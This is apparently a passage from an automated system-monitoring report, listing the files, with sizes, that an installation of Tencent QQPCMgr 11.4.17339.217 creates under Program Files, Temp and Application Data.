    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMGameAssistantPlugin\QMGameAssistantPlugin.rdb (18 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1944.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMVulPlugin\QMVulPlugin.rdb (98 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\IEStartPage.png (433 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepLibDown.dat (12 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SXComBase.dll (1423 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\qqpclaunch\QQPCLaunch.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant\QMLOLAssistant\QMLOLAssistantCore.dll (2700 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\GF.dll (16015 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\com.qq.qmchext.json (209 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1024.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCUpdateAVLib.exe (1759 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\FileOpen.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SmartInstall.dll (2578 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\ProblemInfo.xml (199 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAntiInject.dll (2401 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1022.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\NewPlugin.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1087.dat (447 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibexceptac.xml (27 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMLspPing.exe (1629 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1107.dat (456 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\sm02.dat (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_2015.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1025.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCXPNOTIFY.rdb (1719 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCXPNOTIFY.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\adplugin\QMAdFilter(big).png (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\unstag.etf (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysspeeduprtpplugin\SysSpeedupRtpPlugin.dll (40 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1402.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\tinyxml.dll (963 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1017.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\GameSpeedupGiftBagMgr.dll (4049 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr01.def (28 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\GameBoxPlugin_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCPatch.exe (5447 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\notbolock.sys (21 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetConnect\QMNetConnect.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\UninstallTips.exe (2348 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\data\polyphone.dat (12 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\RtpPage\RtpPage.tpc (674 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMPersonalCenter.rdb (40 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\bugreport_xf.exe (2586 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ScenePackage.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_127.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCClinicNetRepair.png (436 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysmalwarejmp\malware.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_528.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSysOptimizeAssist\denoiser_info.ini (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SuperSpeedup.exe (5707 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSFSEngine.DAT (104 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tsmsc.DAT (580 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.tpc (705 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSVulEngine.dll (7373 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\GF.dll (19043 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSRunner.dll (1312 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\hpclinicscanplugin\HPClinicScanPlugin.dll (863 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QOLogo\Install.png (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUsbGuard.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.rdb (266 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QQPCLeakScan_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMEtw.exe (668 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpload.exe (1850 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr.dll (7038 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\data\speech.dat (91 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMShield64.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameSpeedupGiftBagMgr\GameSpeedupGiftBagMgr.tpc (956 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_867.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QMGameSpeedup_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\libjpegturbo.dll (4594 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRealTimeSpeedupSkinCenter.zip (111 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.dll (7770 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMMobileSettingCenter\QMMobileSettingCenter.tpc (711 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\DownloaderManager.dll (7753 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\FaceMask57.png (530 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMStateCheck.exe (1133 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\AdBlock\AdBlockConf.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMWlanMacDll.dll (3096 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1224.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_642.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMKCheck\QMKCheck.dll (1390 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\qqpcuninstalljump.png (256 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\smanalyplugin\SMAnalyPlugin.rdb (1720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\RemoteAssistance.png (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GFCustom.dll (4797 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMExt.dll (95 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftAnalyzePolicy.etf (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\IEStartPage.rdb (136 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QQPCMgrInstall_20160325034841.Log (18258 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SuperSpeedup.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_391.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_808.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\QQPCMgrUpdate.rdb (1649 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetConnect\QMNetConnectDll.dll (807 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSuperScan.EXE (1382 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\qmspeedupplugin\speeduprocket\SpeedupRocket.dll (10131 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMPerfCtrl\QMPerfCtrl.dll (2802 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTask.dat (600 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\TimingTaskParam.xml (413 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1110.dat (454 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.tpc (707 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFeedBack.dat (704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\MemDefrag.dll (574 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1111.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1526.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1099.dat (447 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMVulPlugin\QMVulPlugin.dll (4690 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TxArp6.inf (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1020.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSecScanLib.dll (1180 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMHealthAssist.png (894 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\GFCustom.dll (3606 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepLibTray.dat (19 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\tsvulinfocrp.db (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOKernelControl.dll (2117 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\Modules.xml (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetflowOpti\NetflowOpti.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\QQPCCommonMgr.rdb (15021 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSysOptimize.exe (8230 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\MalWare.rdb (168 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmsoftplugin\QMSoftPlugin.dll (3253 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1005.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SuperSpeedup.rdb (152 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.tpc (818 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\libjpegturbo.dll (1574 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\UpdateTrayIcon.exe (2228 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\TraceClear\QMTraceClear.PNG (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\msvcr80.dll (6481 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\X5Config.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\jgImage.dll (1127 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\MXConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibfloat.xml (294 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysSpeedUp\sysspeedup.tpc (655 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_191.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr00.def (21 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1031.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\I18N\SSOConfig.xml (394 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameUpgrade.dll (6917 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGCScriptApi.dll (4094 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\GameBoxPlugin.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\starttips.xml (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_898.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftTrayTips.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMOfficeScan.dll (181 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMobileFlux\NetMobileFlux.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\ATL80.dll (1915 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\DownloaderMgrScript.dat (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMLogCtrl\QMLogCtrl.tpc (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\FileUnlock.dll (43 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine\CommonIcon\blank_gray.ico (82 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\GFCustom.dll (6644 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1019.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\FtSysCommonMgrGF.rdb (68 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1027.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCBTU.exe (1149 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\CheckSysHung.dll (2254 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\msvcp80.dll (6658 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.tpc (703 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1997.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.rdb (142 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1701.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SncLib.dat (264 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysstartupmgrjmp\SysStartupMgrJmp.dll (415 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_157.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1012.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Common.dll (16258 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\NPEStartup.db (79 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHIPSService.dll (2271 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCClinic.rdb (3795 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.tpc (669 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GarbageClear.dat (134 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1410.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\qqpctray.dat (704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\GF.dll (18846 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\GF.dll (18769 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\arkGraphic.dll (5038 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\NetMon.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\sCheck_Router.png (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1086.dat (449 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.dll (2817 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMContextScan64.dll (1474 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\dlcore.dll (18551 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_533.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameUpConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SysSpeedUpDll.dll (2349 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.tpc (790 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSVulInc.dat (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\InstAsm.exe (1137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\CODConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_134.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QOLogo\DefaultMgr.png (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QOLogo\QQMobileMgr.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.rdb (101 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_109.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\PCSoftMgrToolsDll.dll (1967 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\traceclear.dat (13 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\libpng.dll (2456 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\Both_Disconnected.png (32 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\RefuseInject.dll (3298 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\PackageConf.dll (2173 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_2000.dat (597 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\OptimizeExDll.dll (5435 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMArpMgr.png (843 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\DownloaderMgrUI\DownloaderMgrUI.tpc (763 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCStub.exe (298 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftConfig.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPYellowTipsMgr.dll (1747 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.rdb (81 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.tpc (723 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1221.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\qqpcupgradejump.png (503 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_129.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.rdb (1624 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSWebMon.dat (4318 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMBluescreenFixer\bugreport.exe (8121 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1021.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRtpDLL.dll (1244 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1002.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\NMLib.dat (101 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_579.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1610.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.rdb (86 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAccountProtection.exe (13306 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\RocketConfig.etf (406 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQRepair.dat (656 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftBaseInfoForFileOpen.etf (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\libjpegturbo.dll (2946 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_116.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMonPlugin.dll (849 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\MFConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\bugreport.exe (7337 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCHwVedioDetect.dll (1945 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.rdb (1626 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSpecTips\QMSpecTips.tpc (685 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1411.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\QQPCDetector\dlcore.dll (18592 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1302.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\xpNotify.html (549 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\libpng.dll (1699 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHPScanAv.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFileMonCyber.dat (718 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\LoadError.html (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMStartupMonitorNotify\whitelist.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\DLProtectComm.dll (1211 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDeskTopGC.rdb (2760 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\Common.dll (17245 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMPToolTrayPlugin\QMPToolTrayPlugin.dll (949 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMRouterPlugin.png (722 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_706.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAssocScanLib2.dat (54 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.rdb (126 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\HPSysScan\HPSysScanner.dll (2942 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1415.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDLPConfig.dat (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GlobalConfig.etf (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\jgIOStub.dll (1938 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1096.dat (449 bytes)
